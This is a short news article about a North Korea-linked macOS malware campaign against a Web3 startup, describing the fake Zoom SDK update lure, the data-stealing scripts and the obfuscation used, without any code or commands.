North Korean Hackers Deploy New Malware to Target Crypto Firms

Over the years, the cryptocurrency space has become a target for bad actors engaging in various illicit activities. Recently, North Korean hackers have deployed new malware with the primary objective of targeting crypto firms.  

According to a recent report, security firm Huntabil.IT revealed a cyberattack targeting a Web3 startup in April 2025. Investigators have linked the breach to a North Korea-based hacking group known as the DPRK. 

Attackers Targeting the Crypto Ecosystem

Malware is malicious software designed to target crypto wallets, exchanges, and other crypto-related resources to steal digital assets, private keys, or sensitive information. These malicious programs can also exploit a victim’s computing power to mine crypto for the attacker or encrypt files and demand a ransom for their recovery.   

In addition to the malicious strategy, cybersecurity experts discovered a diverse attack chain composed of AppleScript, C++, and Nim-based components. While much of the early behavior resembled DPRK tactics, they relied on social manipulation and bait scripts. However, what stood out was the use of Nim code compiled for macOS, which was an unusual twist. 

The binary, compiled in C++, is a universal Mach-O executable. It drops an encrypted payload called netchk onto the system’s disk. From this point forward, the attack proceeds through a layered obfuscation chain designed to mask its true intent. Its primary objective was to download two Bash scripts responsible for extracting both general system metadata and more targeted information, including browser profiles and Telegram conversation histories. 

Deceptive Social Engineering

According to the report, the attack chain was triggered by a social engineering technique commonly seen in recent campaigns. The strategy poses as a legitimate contact on platforms like Telegram and directs the victim to schedule a meeting via Calendly. 

Following initial contact, the attacker delivers an email to the target containing a Zoom link and a prompt to run a script labeled as a “Zoom SDK update,” which serves as the next stage in the attack chain. 

Furthermore, investigators found that the bad actors would send a script. At the end of the script, three sneaky lines of code reach out to a shady server support to grab and run the next piece of the attack. Meanwhile, before initiating communication, the Malware employs several layers of RC4 encryption, integrated with base64 encoding, and utilizes three distinct cryptographic keys to secure its data.

North Korea-linked hacker groups are increasingly becoming a threat to the crypto industry. Earlier this week, the United States Department of Justice charged four North Korean suspects involved in a $1 million crypto scam.